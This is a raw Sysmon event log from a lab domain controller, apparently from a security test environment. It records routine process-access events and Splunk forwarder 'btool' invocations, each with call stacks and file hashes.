13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4321-6000-A900-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.691{08A6967A-4321-6000-A800-000000009A01}13164260C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4321-6000-A900-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.692{08A6967A-4321-6000-A900-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4321-6000-A800-000000009A01}1316C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000003385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-A800-000000009A01}1316C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4321-6000-A800-000000009A01}1316C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4321-6000-A700-000000009A01}11561148C:\Windows\system32\cmd.exe{08A6967A-4321-6000-A800-000000009A01}1316C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.685{08A6967A-4321-6000-A800-000000009A01}1316C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4321-6000-A700-000000009A01}1156C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4321-6000-A700-000000009A01}1156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:01.676{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 